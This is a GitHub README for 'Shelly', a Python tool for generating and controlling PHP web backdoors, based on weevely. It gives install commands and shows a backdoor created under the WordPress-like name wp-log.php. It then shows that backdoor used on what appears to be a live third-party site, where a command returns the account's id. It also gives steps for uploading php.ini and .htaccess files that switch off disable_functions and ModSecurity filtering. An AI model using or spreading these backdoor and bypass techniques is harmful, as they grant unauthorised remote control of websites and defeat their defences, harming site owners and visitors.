Skip to content

tegal1337/Shelly

Repository files navigation

Shelly | Simple Backdoor Manager with Python (based on weevely)

Screenshoot
Shelly is a simple tool that is written using Python, which functions to remote a website

Instalation :

$ git clone https://github.com/tegal1337/Shelly
$ cd Shelly
$ python3 shell.py

Requirements :

sudo pip install -r requirements.txt

Example :

python3 shell.py -g wp-log -p tegal1337
   ______      ____
  / __/ / ___ / / __ __
 _\ \/ _ / -_/ / / // /
/___/_//_\__/_/_/\_, /
                /___/  v.1
--------------------------
Python shell - Tegal1337 |
Generate :
[+] ./backdoor.py -g "nama_shell" -p "password"
Connect Server :
[+] ./backdoor.py -u "url_shell" -p "password"

Backdoor berhasil dibuat dengan nama wp-log.php dan password tegal1337

dalpan@Tegal1337:~/Tools$ python3 shell.py -u "https://www.pamz3d.com/wp-log.php" -p tegal1337
/opt/lampp/htdocs/php-futsal$ id
uid=501(pamz3d) gid=501(pamz3d) groups=501(pamz3d)

Screenshoot Screenshoot

Disable Function Bypass :

  • look for the folder whose permissions 777 (rwx rwx rwx)
  • Upload file php.ini
safe_mode = OFF
disable_functions = NONE
  • And upload file .htaccess
SecFilterEngine Off
SecFilterScanPOST Off

Artikel :

Contact :

  • Email : van@tegalsec.org

Support our organization by giving donations

Foo

About

Simple Backdoor Manager with Python (based on weevely)

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Sponsor this project

Packages

No packages published